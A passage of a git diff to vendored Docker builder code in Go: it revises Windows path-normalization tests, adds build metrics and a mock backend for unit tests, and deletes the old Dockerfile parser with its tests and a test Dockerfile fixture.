|| ch == '[' { - return true - } - } - return false +func parseChownFlag(chown, ctrRootPath string, idMappings *idtools.IDMappings) (idtools.IDPair, error) { + return idMappings.RootPair(), nil } diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go index 868a6671a3..4f00623404 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go @@ -1,17 +1,23 @@ // +build windows -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" -import "testing" +import ( + "fmt" + "testing" -func TestNormaliseDest(t *testing.T) { + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestNormalizeDest(t *testing.T) { tests := []struct{ current, requested, expected, etext string }{ - {``, `D:\`, ``, `Windows does not support TEST with a destinations not on the system drive (C:)`}, - {``, `e:/`, ``, `Windows does not support TEST with a destinations not on the system drive (C:)`}, + {``, `D:\`, ``, `Windows does not support destinations not on the system drive (C:)`}, + {``, `e:/`, ``, `Windows does not support destinations not on the system drive (C:)`}, {`invalid`, `./c1`, ``, `Current WorkingDir invalid is not platform consistent`}, {`C:`, ``, ``, `Current WorkingDir C: is not platform consistent`}, {`C`, ``, ``, `Current WorkingDir C is not platform consistent`}, - {`D:\`, `.`, ``, "Windows does not support TEST with relative paths when WORKDIR is not the system drive"}, + {`D:\`, `.`, ``, "Windows does not support relative paths when WORKDIR is not the system drive"}, {``, `D`, `D`, ``}, {``, `./a1`, `.\a1`, ``}, {``, `.\b1`, `.\b1`, ``}, @@ -32,20 +38,16 @@ func TestNormaliseDest(t *testing.T) { {`C:\wdm`, `foo/bar/`, `\wdm\foo\bar\`, ``}, {`C:\wdn`, `foo\bar/`, `\wdn\foo\bar\`, ``}, } - for _, i := 
range tests { - got, err := normaliseDest("TEST", i.current, i.requested) - if err != nil && i.etext == "" { - t.Fatalf("TestNormaliseDest Got unexpected error %q for %s %s. ", err.Error(), i.current, i.requested) - } - if i.etext != "" && ((err == nil) || (err != nil && err.Error() != i.etext)) { - if err == nil { - t.Fatalf("TestNormaliseDest Expected an error for %s %s but didn't get one", i.current, i.requested) - } else { - t.Fatalf("TestNormaliseDest Wrong error text for %s %s - %s", i.current, i.requested, err.Error()) + for _, testcase := range tests { + msg := fmt.Sprintf("Input: %s, %s", testcase.current, testcase.requested) + actual, err := normalizeDest(testcase.current, testcase.requested, "windows") + if testcase.etext == "" { + if !assert.Check(t, err, msg) { + continue } - } - if i.etext == "" && got != i.expected { - t.Fatalf("TestNormaliseDest Expected %q for %q and %q. Got %q", i.expected, i.current, i.requested, got) + assert.Check(t, is.Equal(testcase.expected, actual), msg) + } else { + assert.Check(t, is.ErrorContains(err, testcase.etext)) } } } diff --git a/vendor/github.com/docker/docker/builder/dockerfile/metrics.go b/vendor/github.com/docker/docker/builder/dockerfile/metrics.go new file mode 100644 index 0000000000..ceafa7ad62 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/metrics.go @@ -0,0 +1,44 @@ +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "github.com/docker/go-metrics" +) + +var ( + buildsTriggered metrics.Counter + buildsFailed metrics.LabeledCounter +) + +// Build metrics prometheus messages, these values must be initialized before +// using them. See the example below in the "builds_failed" metric definition. 
+const ( + metricsDockerfileSyntaxError = "dockerfile_syntax_error" + metricsDockerfileEmptyError = "dockerfile_empty_error" + metricsCommandNotSupportedError = "command_not_supported_error" + metricsErrorProcessingCommandsError = "error_processing_commands_error" + metricsBuildTargetNotReachableError = "build_target_not_reachable_error" + metricsMissingOnbuildArgumentsError = "missing_onbuild_arguments_error" + metricsUnknownInstructionError = "unknown_instruction_error" + metricsBuildCanceled = "build_canceled" +) + +func init() { + buildMetrics := metrics.NewNamespace("builder", "", nil) + + buildsTriggered = buildMetrics.NewCounter("builds_triggered", "Number of triggered image builds") + buildsFailed = buildMetrics.NewLabeledCounter("builds_failed", "Number of failed image builds", "reason") + for _, r := range []string{ + metricsDockerfileSyntaxError, + metricsDockerfileEmptyError, + metricsCommandNotSupportedError, + metricsErrorProcessingCommandsError, + metricsBuildTargetNotReachableError, + metricsMissingOnbuildArgumentsError, + metricsUnknownInstructionError, + metricsBuildCanceled, + } { + buildsFailed.WithValues(r) + } + + metrics.Register(buildMetrics) +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/mockbackend_test.go b/vendor/github.com/docker/docker/builder/dockerfile/mockbackend_test.go new file mode 100644 index 0000000000..45cba00a8c --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/mockbackend_test.go @@ -0,0 +1,148 @@ +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "context" + "encoding/json" + "io" + "runtime" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/builder" + containerpkg "github.com/docker/docker/container" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/containerfs" +) + +// 
MockBackend implements the builder.Backend interface for unit testing +type MockBackend struct { + containerCreateFunc func(config types.ContainerCreateConfig) (container.ContainerCreateCreatedBody, error) + commitFunc func(backend.CommitConfig) (image.ID, error) + getImageFunc func(string) (builder.Image, builder.ROLayer, error) + makeImageCacheFunc func(cacheFrom []string) builder.ImageCache +} + +func (m *MockBackend) ContainerAttachRaw(cID string, stdin io.ReadCloser, stdout, stderr io.Writer, stream bool, attached chan struct{}) error { + return nil +} + +func (m *MockBackend) ContainerCreate(config types.ContainerCreateConfig) (container.ContainerCreateCreatedBody, error) { + if m.containerCreateFunc != nil { + return m.containerCreateFunc(config) + } + return container.ContainerCreateCreatedBody{}, nil +} + +func (m *MockBackend) ContainerRm(name string, config *types.ContainerRmConfig) error { + return nil +} + +func (m *MockBackend) CommitBuildStep(c backend.CommitConfig) (image.ID, error) { + if m.commitFunc != nil { + return m.commitFunc(c) + } + return "", nil +} + +func (m *MockBackend) ContainerKill(containerID string, sig uint64) error { + return nil +} + +func (m *MockBackend) ContainerStart(containerID string, hostConfig *container.HostConfig, checkpoint string, checkpointDir string) error { + return nil +} + +func (m *MockBackend) ContainerWait(ctx context.Context, containerID string, condition containerpkg.WaitCondition) (<-chan containerpkg.StateStatus, error) { + return nil, nil +} + +func (m *MockBackend) ContainerCreateWorkdir(containerID string) error { + return nil +} + +func (m *MockBackend) CopyOnBuild(containerID string, destPath string, srcRoot string, srcPath string, decompress bool) error { + return nil +} + +func (m *MockBackend) GetImageAndReleasableLayer(ctx context.Context, refOrID string, opts backend.GetImageAndLayerOptions) (builder.Image, builder.ROLayer, error) { + if m.getImageFunc != nil { + return m.getImageFunc(refOrID) + 
} + + return &mockImage{id: "theid"}, &mockLayer{}, nil +} + +func (m *MockBackend) MakeImageCache(cacheFrom []string) builder.ImageCache { + if m.makeImageCacheFunc != nil { + return m.makeImageCacheFunc(cacheFrom) + } + return nil +} + +func (m *MockBackend) CreateImage(config []byte, parent string) (builder.Image, error) { + return nil, nil +} + +type mockImage struct { + id string + config *container.Config +} + +func (i *mockImage) ImageID() string { + return i.id +} + +func (i *mockImage) RunConfig() *container.Config { + return i.config +} + +func (i *mockImage) OperatingSystem() string { + return runtime.GOOS +} + +func (i *mockImage) MarshalJSON() ([]byte, error) { + type rawImage mockImage + return json.Marshal(rawImage(*i)) +} + +type mockImageCache struct { + getCacheFunc func(parentID string, cfg *container.Config) (string, error) +} + +func (mic *mockImageCache) GetCache(parentID string, cfg *container.Config) (string, error) { + if mic.getCacheFunc != nil { + return mic.getCacheFunc(parentID, cfg) + } + return "", nil +} + +type mockLayer struct{} + +func (l *mockLayer) Release() error { + return nil +} + +func (l *mockLayer) NewRWLayer() (builder.RWLayer, error) { + return &mockRWLayer{}, nil +} + +func (l *mockLayer) DiffID() layer.DiffID { + return layer.DiffID("abcdef") +} + +type mockRWLayer struct { +} + +func (l *mockRWLayer) Release() error { + return nil +} + +func (l *mockRWLayer) Commit() (builder.ROLayer, error) { + return nil, nil +} + +func (l *mockRWLayer) Root() containerfs.ContainerFS { + return nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go deleted file mode 100644 index fff3046fd3..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go +++ /dev/null @@ -1,36 +0,0 @@ -package main - -import ( - "fmt" - "os" - - "github.com/docker/docker/builder/dockerfile/parser" -) - -func 
main() { - var f *os.File - var err error - - if len(os.Args) < 2 { - fmt.Println("please supply filename(s)") - os.Exit(1) - } - - for _, fn := range os.Args[1:] { - f, err = os.Open(fn) - if err != nil { - panic(err) - } - defer f.Close() - - d := parser.Directive{LookingForDirectives: true} - parser.SetEscapeToken(parser.DefaultEscapeToken, &d) - - ast, err := parser.Parse(f, &d) - if err != nil { - panic(err) - } else { - fmt.Println(ast.Dump()) - } - } -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go deleted file mode 100644 index 60d74d9c36..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go +++ /dev/null @@ -1,61 +0,0 @@ -package parser - -import ( - "testing" -) - -var invalidJSONArraysOfStrings = []string{ - `["a",42,"b"]`, - `["a",123.456,"b"]`, - `["a",{},"b"]`, - `["a",{"c": "d"},"b"]`, - `["a",["c"],"b"]`, - `["a",true,"b"]`, - `["a",false,"b"]`, - `["a",null,"b"]`, -} - -var validJSONArraysOfStrings = map[string][]string{ - `[]`: {}, - `[""]`: {""}, - `["a"]`: {"a"}, - `["a","b"]`: {"a", "b"}, - `[ "a", "b" ]`: {"a", "b"}, - `[ "a", "b" ]`: {"a", "b"}, - ` [ "a", "b" ] `: {"a", "b"}, - `["abc 123", "♥", "☃", "\" \\ \/ \b \f \n \r \t \u0000"]`: {"abc 123", "♥", "☃", "\" \\ / \b \f \n \r \t \u0000"}, -} - -func TestJSONArraysOfStrings(t *testing.T) { - for json, expected := range validJSONArraysOfStrings { - d := Directive{} - SetEscapeToken(DefaultEscapeToken, &d) - - if node, _, err := parseJSON(json, &d); err != nil { - t.Fatalf("%q should be a valid JSON array of strings, but wasn't! 
(err: %q)", json, err) - } else { - i := 0 - for node != nil { - if i >= len(expected) { - t.Fatalf("expected result is shorter than parsed result (%d vs %d+) in %q", len(expected), i+1, json) - } - if node.Value != expected[i] { - t.Fatalf("expected %q (not %q) in %q at pos %d", expected[i], node.Value, json, i) - } - node = node.Next - i++ - } - if i != len(expected) { - t.Fatalf("expected result is longer than parsed result (%d vs %d) in %q", len(expected), i+1, json) - } - } - } - for _, json := range invalidJSONArraysOfStrings { - d := Directive{} - SetEscapeToken(DefaultEscapeToken, &d) - - if _, _, err := parseJSON(json, &d); err != errDockerfileNotStringArray { - t.Fatalf("%q should be an invalid JSON array of strings, but wasn't!", json) - } - } -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go deleted file mode 100644 index d2bf2b01b1..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go +++ /dev/null @@ -1,361 +0,0 @@ -package parser - -// line parsers are dispatch calls that parse a single unit of text into a -// Node object which contains the whole statement. Dockerfiles have varied -// (but not usually unique, see ONBUILD for a unique example) parsing rules -// per-command, and these unify the processing in a way that makes it -// manageable. - -import ( - "encoding/json" - "errors" - "fmt" - "strings" - "unicode" - "unicode/utf8" -) - -var ( - errDockerfileNotStringArray = errors.New("When using JSON array syntax, arrays must be comprised of strings only.") -) - -// ignore the current argument. This will still leave a command parsed, but -// will not incorporate the arguments into the ast. -func parseIgnore(rest string, d *Directive) (*Node, map[string]bool, error) { - return &Node{}, nil, nil -} - -// used for onbuild. 
Could potentially be used for anything that represents a -// statement with sub-statements. -// -// ONBUILD RUN foo bar -> (onbuild (run foo bar)) -// -func parseSubCommand(rest string, d *Directive) (*Node, map[string]bool, error) { - if rest == "" { - return nil, nil, nil - } - - _, child, err := ParseLine(rest, d, false) - if err != nil { - return nil, nil, err - } - - return &Node{Children: []*Node{child}}, nil, nil -} - -// helper to parse words (i.e space delimited or quoted strings) in a statement. -// The quotes are preserved as part of this function and they are stripped later -// as part of processWords(). -func parseWords(rest string, d *Directive) []string { - const ( - inSpaces = iota // looking for start of a word - inWord - inQuote - ) - - words := []string{} - phase := inSpaces - word := "" - quote := '\000' - blankOK := false - var ch rune - var chWidth int - - for pos := 0; pos <= len(rest); pos += chWidth { - if pos != len(rest) { - ch, chWidth = utf8.DecodeRuneInString(rest[pos:]) - } - - if phase == inSpaces { // Looking for start of word - if pos == len(rest) { // end of input - break - } - if unicode.IsSpace(ch) { // skip spaces - continue - } - phase = inWord // found it, fall through - } - if (phase == inWord || phase == inQuote) && (pos == len(rest)) { - if blankOK || len(word) > 0 { - words = append(words, word) - } - break - } - if phase == inWord { - if unicode.IsSpace(ch) { - phase = inSpaces - if blankOK || len(word) > 0 { - words = append(words, word) - } - word = "" - blankOK = false - continue - } - if ch == '\'' || ch == '"' { - quote = ch - blankOK = true - phase = inQuote - } - if ch == d.EscapeToken { - if pos+chWidth == len(rest) { - continue // just skip an escape token at end of line - } - // If we're not quoted and we see an escape token, then always just - // add the escape token plus the char to the word, even if the char - // is a quote. 
- word += string(ch) - pos += chWidth - ch, chWidth = utf8.DecodeRuneInString(rest[pos:]) - } - word += string(ch) - continue - } - if phase == inQuote { - if ch == quote { - phase = inWord - } - // The escape token is special except for ' quotes - can't escape anything for ' - if ch == d.EscapeToken && quote != '\'' { - if pos+chWidth == len(rest) { - phase = inWord - continue // just skip the escape token at end - } - pos += chWidth - word += string(ch) - ch, chWidth = utf8.DecodeRuneInString(rest[pos:]) - } - word += string(ch) - } - } - - return words -} - -// parse environment like statements. Note that this does *not* handle -// variable interpolation, which will be handled in the evaluator. -func parseNameVal(rest string, key string, d *Directive) (*Node, map[string]bool, error) { - // This is kind of tricky because we need to support the old - // variant: KEY name value - // as well as the new one: KEY name=value ... - // The trigger to know which one is being used will be whether we hit - // a space or = first. space ==> old, "=" ==> new - - words := parseWords(rest, d) - if len(words) == 0 { - return nil, nil, nil - } - - var rootnode *Node - - // Old format (KEY name value) - if !strings.Contains(words[0], "=") { - node := &Node{} - rootnode = node - strs := tokenWhitespace.Split(rest, 2) - - if len(strs) < 2 { - return nil, nil, fmt.Errorf(key + " must have two arguments") - } - - node.Value = strs[0] - node.Next = &Node{} - node.Next.Value = strs[1] - } else { - var prevNode *Node - for i, word := range words { - if !strings.Contains(word, "=") { - return nil, nil, fmt.Errorf("Syntax error - can't find = in %q. 
Must be of the form: name=value", word) - } - parts := strings.SplitN(word, "=", 2) - - name := &Node{} - value := &Node{} - - name.Next = value - name.Value = parts[0] - value.Value = parts[1] - - if i == 0 { - rootnode = name - } else { - prevNode.Next = name - } - prevNode = value - } - } - - return rootnode, nil, nil -} - -func parseEnv(rest string, d *Directive) (*Node, map[string]bool, error) { - return parseNameVal(rest, "ENV", d) -} - -func parseLabel(rest string, d *Directive) (*Node, map[string]bool, error) { - return parseNameVal(rest, "LABEL", d) -} - -// parses a statement containing one or more keyword definition(s) and/or -// value assignments, like `name1 name2= name3="" name4=value`. -// Note that this is a stricter format than the old format of assignment, -// allowed by parseNameVal(), in a way that this only allows assignment of the -// form `keyword=[]` like `name2=`, `name3=""`, and `name4=value` above. -// In addition, a keyword definition alone is of the form `keyword` like `name1` -// above. And the assignments `name2=` and `name3=""` are equivalent and -// assign an empty value to the respective keywords. -func parseNameOrNameVal(rest string, d *Directive) (*Node, map[string]bool, error) { - words := parseWords(rest, d) - if len(words) == 0 { - return nil, nil, nil - } - - var ( - rootnode *Node - prevNode *Node - ) - for i, word := range words { - node := &Node{} - node.Value = word - if i == 0 { - rootnode = node - } else { - prevNode.Next = node - } - prevNode = node - } - - return rootnode, nil, nil -} - -// parses a whitespace-delimited set of arguments. The result is effectively a -// linked list of string arguments. 
-func parseStringsWhitespaceDelimited(rest string, d *Directive) (*Node, map[string]bool, error) { - if rest == "" { - return nil, nil, nil - } - - node := &Node{} - rootnode := node - prevnode := node - for _, str := range tokenWhitespace.Split(rest, -1) { // use regexp - prevnode = node - node.Value = str - node.Next = &Node{} - node = node.Next - } - - // XXX to get around regexp.Split *always* providing an empty string at the - // end due to how our loop is constructed, nil out the last node in the - // chain. - prevnode.Next = nil - - return rootnode, nil, nil -} - -// parsestring just wraps the string in quotes and returns a working node. -func parseString(rest string, d *Directive) (*Node, map[string]bool, error) { - if rest == "" { - return nil, nil, nil - } - n := &Node{} - n.Value = rest - return n, nil, nil -} - -// parseJSON converts JSON arrays to an AST. -func parseJSON(rest string, d *Directive) (*Node, map[string]bool, error) { - rest = strings.TrimLeftFunc(rest, unicode.IsSpace) - if !strings.HasPrefix(rest, "[") { - return nil, nil, fmt.Errorf(`Error parsing "%s" as a JSON array`, rest) - } - - var myJSON []interface{} - if err := json.NewDecoder(strings.NewReader(rest)).Decode(&myJSON); err != nil { - return nil, nil, err - } - - var top, prev *Node - for _, str := range myJSON { - s, ok := str.(string) - if !ok { - return nil, nil, errDockerfileNotStringArray - } - - node := &Node{Value: s} - if prev == nil { - top = node - } else { - prev.Next = node - } - prev = node - } - - return top, map[string]bool{"json": true}, nil -} - -// parseMaybeJSON determines if the argument appears to be a JSON array. If -// so, passes to parseJSON; if not, quotes the result and returns a single -// node. 
-func parseMaybeJSON(rest string, d *Directive) (*Node, map[string]bool, error) { - if rest == "" { - return nil, nil, nil - } - - node, attrs, err := parseJSON(rest, d) - - if err == nil { - return node, attrs, nil - } - if err == errDockerfileNotStringArray { - return nil, nil, err - } - - node = &Node{} - node.Value = rest - return node, nil, nil -} - -// parseMaybeJSONToList determines if the argument appears to be a JSON array. If -// so, passes to parseJSON; if not, attempts to parse it as a whitespace -// delimited string. -func parseMaybeJSONToList(rest string, d *Directive) (*Node, map[string]bool, error) { - node, attrs, err := parseJSON(rest, d) - - if err == nil { - return node, attrs, nil - } - if err == errDockerfileNotStringArray { - return nil, nil, err - } - - return parseStringsWhitespaceDelimited(rest, d) -} - -// The HEALTHCHECK command is like parseMaybeJSON, but has an extra type argument. -func parseHealthConfig(rest string, d *Directive) (*Node, map[string]bool, error) { - // Find end of first argument - var sep int - for ; sep < len(rest); sep++ { - if unicode.IsSpace(rune(rest[sep])) { - break - } - } - next := sep - for ; next < len(rest); next++ { - if !unicode.IsSpace(rune(rest[next])) { - break - } - } - - if sep == 0 { - return nil, nil, nil - } - - typ := rest[:sep] - cmd, attrs, err := parseMaybeJSON(rest[next:], d) - if err != nil { - return nil, nil, err - } - - return &Node{Value: typ, Next: cmd}, attrs, err -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go deleted file mode 100644 index e534644491..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go +++ /dev/null @@ -1,221 +0,0 @@ -// Package parser implements a parser and parse tree dumper for Dockerfiles. 
-package parser - -import ( - "bufio" - "bytes" - "fmt" - "io" - "regexp" - "strings" - "unicode" - - "github.com/docker/docker/builder/dockerfile/command" -) - -// Node is a structure used to represent a parse tree. -// -// In the node there are three fields, Value, Next, and Children. Value is the -// current token's string value. Next is always the next non-child token, and -// children contains all the children. Here's an example: -// -// (value next (child child-next child-next-next) next-next) -// -// This data structure is frankly pretty lousy for handling complex languages, -// but lucky for us the Dockerfile isn't very complicated. This structure -// works a little more effectively than a "proper" parse tree for our needs. -// -type Node struct { - Value string // actual content - Next *Node // the next item in the current sexp - Children []*Node // the children of this sexp - Attributes map[string]bool // special attributes for this node - Original string // original line used before parsing - Flags []string // only top Node should have this set - StartLine int // the line in the original dockerfile where the node begins - EndLine int // the line in the original dockerfile where the node ends -} - -// Directive is the structure used during a build run to hold the state of -// parsing directives. 
-type Directive struct { - EscapeToken rune // Current escape token - LineContinuationRegex *regexp.Regexp // Current line contination regex - LookingForDirectives bool // Whether we are currently looking for directives - EscapeSeen bool // Whether the escape directive has been seen -} - -var ( - dispatch map[string]func(string, *Directive) (*Node, map[string]bool, error) - tokenWhitespace = regexp.MustCompile(`[\t\v\f\r ]+`) - tokenEscapeCommand = regexp.MustCompile(`^#[ \t]*escape[ \t]*=[ \t]*(?P.).*$`) - tokenComment = regexp.MustCompile(`^#.*$`) -) - -// DefaultEscapeToken is the default escape token -const DefaultEscapeToken = "\\" - -// SetEscapeToken sets the default token for escaping characters in a Dockerfile. -func SetEscapeToken(s string, d *Directive) error { - if s != "`" && s != "\\" { - return fmt.Errorf("invalid ESCAPE '%s'. Must be ` or \\", s) - } - d.EscapeToken = rune(s[0]) - d.LineContinuationRegex = regexp.MustCompile(`\` + s + `[ \t]*$`) - return nil -} - -func init() { - // Dispatch Table. see line_parsers.go for the parse functions. - // The command is parsed and mapped to the line parser. The line parser - // receives the arguments but not the command, and returns an AST after - // reformulating the arguments according to the rules in the parser - // functions. Errors are propagated up by Parse() and the resulting AST can - // be incorporated directly into the existing AST as a next. 
- dispatch = map[string]func(string, *Directive) (*Node, map[string]bool, error){ - command.Add: parseMaybeJSONToList, - command.Arg: parseNameOrNameVal, - command.Cmd: parseMaybeJSON, - command.Copy: parseMaybeJSONToList, - command.Entrypoint: parseMaybeJSON, - command.Env: parseEnv, - command.Expose: parseStringsWhitespaceDelimited, - command.From: parseString, - command.Healthcheck: parseHealthConfig, - command.Label: parseLabel, - command.Maintainer: parseString, - command.Onbuild: parseSubCommand, - command.Run: parseMaybeJSON, - command.Shell: parseMaybeJSON, - command.StopSignal: parseString, - command.User: parseString, - command.Volume: parseMaybeJSONToList, - command.Workdir: parseString, - } -} - -// ParseLine parses a line and returns the remainder. -func ParseLine(line string, d *Directive, ignoreCont bool) (string, *Node, error) { - // Handle the parser directive '# escape=. Parser directives must precede - // any builder instruction or other comments, and cannot be repeated. 
- if d.LookingForDirectives { - tecMatch := tokenEscapeCommand.FindStringSubmatch(strings.ToLower(line)) - if len(tecMatch) > 0 { - if d.EscapeSeen == true { - return "", nil, fmt.Errorf("only one escape parser directive can be used") - } - for i, n := range tokenEscapeCommand.SubexpNames() { - if n == "escapechar" { - if err := SetEscapeToken(tecMatch[i], d); err != nil { - return "", nil, err - } - d.EscapeSeen = true - return "", nil, nil - } - } - } - } - - d.LookingForDirectives = false - - if line = stripComments(line); line == "" { - return "", nil, nil - } - - if !ignoreCont && d.LineContinuationRegex.MatchString(line) { - line = d.LineContinuationRegex.ReplaceAllString(line, "") - return line, nil, nil - } - - cmd, flags, args, err := splitCommand(line) - if err != nil { - return "", nil, err - } - - node := &Node{} - node.Value = cmd - - sexp, attrs, err := fullDispatch(cmd, args, d) - if err != nil { - return "", nil, err - } - - node.Next = sexp - node.Attributes = attrs - node.Original = line - node.Flags = flags - - return "", node, nil -} - -// Parse is the main parse routine. -// It handles an io.ReadWriteCloser and returns the root of the AST. 
-func Parse(rwc io.Reader, d *Directive) (*Node, error) { - currentLine := 0 - root := &Node{} - root.StartLine = -1 - scanner := bufio.NewScanner(rwc) - - utf8bom := []byte{0xEF, 0xBB, 0xBF} - for scanner.Scan() { - scannedBytes := scanner.Bytes() - // We trim UTF8 BOM - if currentLine == 0 { - scannedBytes = bytes.TrimPrefix(scannedBytes, utf8bom) - } - scannedLine := strings.TrimLeftFunc(string(scannedBytes), unicode.IsSpace) - currentLine++ - line, child, err := ParseLine(scannedLine, d, false) - if err != nil { - return nil, err - } - startLine := currentLine - - if line != "" && child == nil { - for scanner.Scan() { - newline := scanner.Text() - currentLine++ - - if stripComments(strings.TrimSpace(newline)) == "" { - continue - } - - line, child, err = ParseLine(line+newline, d, false) - if err != nil { - return nil, err - } - - if child != nil { - break - } - } - if child == nil && line != "" { - // When we call ParseLine we'll pass in 'true' for - // the ignoreCont param if we're at the EOF. This will - // prevent the func from returning immediately w/o - // parsing the line thinking that there's more input - // to come. - - _, child, err = ParseLine(line, d, scanner.Err() == nil) - if err != nil { - return nil, err - } - } - } - - if child != nil { - // Update the line information for the current child. - child.StartLine = startLine - child.EndLine = currentLine - // Update the line information for the root. The starting line of the root is always the - // starting line of the first child and the ending line is the ending line of the last child. 
- if root.StartLine < 0 { - root.StartLine = currentLine - } - root.EndLine = currentLine - root.Children = append(root.Children, child) - } - } - - return root, nil -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go deleted file mode 100644 index e8e26961de..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go +++ /dev/null @@ -1,173 +0,0 @@ -package parser - -import ( - "bytes" - "fmt" - "io/ioutil" - "os" - "path/filepath" - "runtime" - "testing" -) - -const testDir = "testfiles" -const negativeTestDir = "testfiles-negative" -const testFileLineInfo = "testfile-line/Dockerfile" - -func getDirs(t *testing.T, dir string) []string { - f, err := os.Open(dir) - if err != nil { - t.Fatal(err) - } - - defer f.Close() - - dirs, err := f.Readdirnames(0) - if err != nil { - t.Fatal(err) - } - - return dirs -} - -func TestTestNegative(t *testing.T) { - for _, dir := range getDirs(t, negativeTestDir) { - dockerfile := filepath.Join(negativeTestDir, dir, "Dockerfile") - - df, err := os.Open(dockerfile) - if err != nil { - t.Fatalf("Dockerfile missing for %s: %v", dir, err) - } - defer df.Close() - - d := Directive{LookingForDirectives: true} - SetEscapeToken(DefaultEscapeToken, &d) - _, err = Parse(df, &d) - if err == nil { - t.Fatalf("No error parsing broken dockerfile for %s", dir) - } - } -} - -func TestTestData(t *testing.T) { - for _, dir := range getDirs(t, testDir) { - dockerfile := filepath.Join(testDir, dir, "Dockerfile") - resultfile := filepath.Join(testDir, dir, "result") - - df, err := os.Open(dockerfile) - if err != nil { - t.Fatalf("Dockerfile missing for %s: %v", dir, err) - } - defer df.Close() - - d := Directive{LookingForDirectives: true} - SetEscapeToken(DefaultEscapeToken, &d) - ast, err := Parse(df, &d) - if err != nil { - t.Fatalf("Error parsing %s's dockerfile: %v", dir, err) - } - - content, err := 
ioutil.ReadFile(resultfile) - if err != nil { - t.Fatalf("Error reading %s's result file: %v", dir, err) - } - - if runtime.GOOS == "windows" { - // CRLF --> CR to match Unix behavior - content = bytes.Replace(content, []byte{'\x0d', '\x0a'}, []byte{'\x0a'}, -1) - } - - if ast.Dump()+"\n" != string(content) { - fmt.Fprintln(os.Stderr, "Result:\n"+ast.Dump()) - fmt.Fprintln(os.Stderr, "Expected:\n"+string(content)) - t.Fatalf("%s: AST dump of dockerfile does not match result", dir) - } - } -} - -func TestParseWords(t *testing.T) { - tests := []map[string][]string{ - { - "input": {"foo"}, - "expect": {"foo"}, - }, - { - "input": {"foo bar"}, - "expect": {"foo", "bar"}, - }, - { - "input": {"foo\\ bar"}, - "expect": {"foo\\ bar"}, - }, - { - "input": {"foo=bar"}, - "expect": {"foo=bar"}, - }, - { - "input": {"foo bar 'abc xyz'"}, - "expect": {"foo", "bar", "'abc xyz'"}, - }, - { - "input": {`foo bar "abc xyz"`}, - "expect": {"foo", "bar", `"abc xyz"`}, - }, - { - "input": {"àöû"}, - "expect": {"àöû"}, - }, - { - "input": {`föo bàr "âbc xÿz"`}, - "expect": {"föo", "bàr", `"âbc xÿz"`}, - }, - } - - for _, test := range tests { - d := Directive{LookingForDirectives: true} - SetEscapeToken(DefaultEscapeToken, &d) - words := parseWords(test["input"][0], &d) - if len(words) != len(test["expect"]) { - t.Fatalf("length check failed. input: %v, expect: %q, output: %q", test["input"][0], test["expect"], words) - } - for i, word := range words { - if word != test["expect"][i] { - t.Fatalf("word check failed for word: %q. 
input: %q, expect: %q, output: %q", word, test["input"][0], test["expect"], words) - } - } - } -} - -func TestLineInformation(t *testing.T) { - df, err := os.Open(testFileLineInfo) - if err != nil { - t.Fatalf("Dockerfile missing for %s: %v", testFileLineInfo, err) - } - defer df.Close() - - d := Directive{LookingForDirectives: true} - SetEscapeToken(DefaultEscapeToken, &d) - ast, err := Parse(df, &d) - if err != nil { - t.Fatalf("Error parsing dockerfile %s: %v", testFileLineInfo, err) - } - - if ast.StartLine != 5 || ast.EndLine != 31 { - fmt.Fprintf(os.Stderr, "Wrong root line information: expected(%d-%d), actual(%d-%d)\n", 5, 31, ast.StartLine, ast.EndLine) - t.Fatalf("Root line information doesn't match result.") - } - if len(ast.Children) != 3 { - fmt.Fprintf(os.Stderr, "Wrong number of child: expected(%d), actual(%d)\n", 3, len(ast.Children)) - t.Fatalf("Root line information doesn't match result for %s", testFileLineInfo) - } - expected := [][]int{ - {5, 5}, - {11, 12}, - {17, 31}, - } - for i, child := range ast.Children { - if child.StartLine != expected[i][0] || child.EndLine != expected[i][1] { - t.Logf("Wrong line information for child %d: expected(%d-%d), actual(%d-%d)\n", - i, expected[i][0], expected[i][1], child.StartLine, child.EndLine) - t.Fatalf("Root line information doesn't match result.") - } - } -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile deleted file mode 100644 index c7601c9f69..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile +++ /dev/null @@ -1,35 +0,0 @@ -# ESCAPE=\ - - - -FROM brimstone/ubuntu:14.04 - - -# TORUN -v /var/run/docker.sock:/var/run/docker.sock - - -ENV GOPATH \ -/go - - - -# Install the packages we need, clean up after them and us -RUN apt-get update \ - && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean \ - - - && apt-get install 
